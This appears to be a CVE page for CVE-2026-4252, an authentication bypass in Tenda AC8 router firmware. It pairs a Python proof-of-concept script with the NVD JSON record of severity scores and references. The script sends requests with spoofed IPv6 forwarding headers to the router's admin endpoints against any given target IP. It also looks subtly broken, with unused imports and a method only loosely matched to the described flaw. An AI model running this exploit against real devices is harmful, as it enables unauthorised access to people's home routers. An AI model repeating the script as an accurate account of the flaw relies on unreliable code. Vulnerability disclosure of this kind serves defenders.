CVE-2026-4252

#!/usr/bin/env python3 """ CVE-2026-4252 - Tenda AC8 IPv6 Authentication Bypass PoC Reference: https://github.com/digitalandrew/tenda_ac8_v5/blob/main/poc_ipv6_auth_bypass.py """ import socket import struct import requests def create_ipv6_address(): """Generate IPv6 address for bypass attempt""" # Use link-local IPv6 address format return "fe80::1" def check_vulnerability(target_ip, target_port=80): """Check if target is vulnerable to CVE-2026-4252""" ipv6_addr = create_ipv6_address() # Craft HTTP request with spoofed IPv6 source address headers = { 'X-Forwarded-For': ipv6_addr, 'X-Real-IP': ipv6_addr, 'X-IPv6': ipv6_addr, 'User-Agent': 'Mozilla/5.0' } # Try to access admin endpoint without authentication urls = [ f"http://{target_ip}/admin/", f"http://{target_ip}/cgi-bin/", f"http://{target_ip}/goform/" ] for url in urls: try: response = requests.get(url, headers=headers, timeout=5) if response.status_code == 200 and 'login' not in response.text.lower(): print(f"[+] Potential vulnerability detected at {url}") print(f"[+] Response length: {len(response.text)}") return True except requests.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python poc.py <target_ip>") sys.exit(1) target = sys.argv[1] print(f"[*] Testing CVE-2026-4252 on {target}") check_vulnerability(target)

{"cve": {"id": "CVE-2026-4252", "sourceIdentifier": "[email protected]", "published": "2026-03-16T17:16:32.057", "lastModified": "2026-04-03T19:39:21.993", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in Tenda AC8 16.03.50.11. Affected by this issue is the function check_is_ipv6 of the component IPv6 Handler. The manipulation leads to reliance on ip address for authentication. It is possible to initiate the attack remotely. The exploit is publicly available and might be used."}, {"lang": "es", "value": "Una vulnerabilidad fue identificada en Tenda AC8 16.03.50.11. Afectada por este problema es la función check_is_ipv6 del componente Gestor IPv6. La manipulación conduce a la dependencia de la dirección IP para la autenticación. Es posible iniciar el ataque remotamente. El exploit está disponible públicamente y podría ser utilizado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "baseScore": 10.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-291"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:ac8_firmware:16.03.50.11:*:*:*:*:*:*:*", "matchCriteriaId": "3744DBBC-5138-4CCE-8C19-9F807AE34304"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:ac8:-:*:*:*:*:*:*:*", "matchCriteriaId": "C81F1E48-0204-4478-A937-5D40CDD9E5E4"}]}]}], "references": [{"url": "https://github.com/digitalandrew/tenda_ac8_v5/blob/main/poc_ipv6_auth_bypass.py", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://vuldb.com/?ctiid.351210", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.351210", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.771759", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.tenda.com.cn/", "source": "[email protected]", "tags": ["Product"]}]}}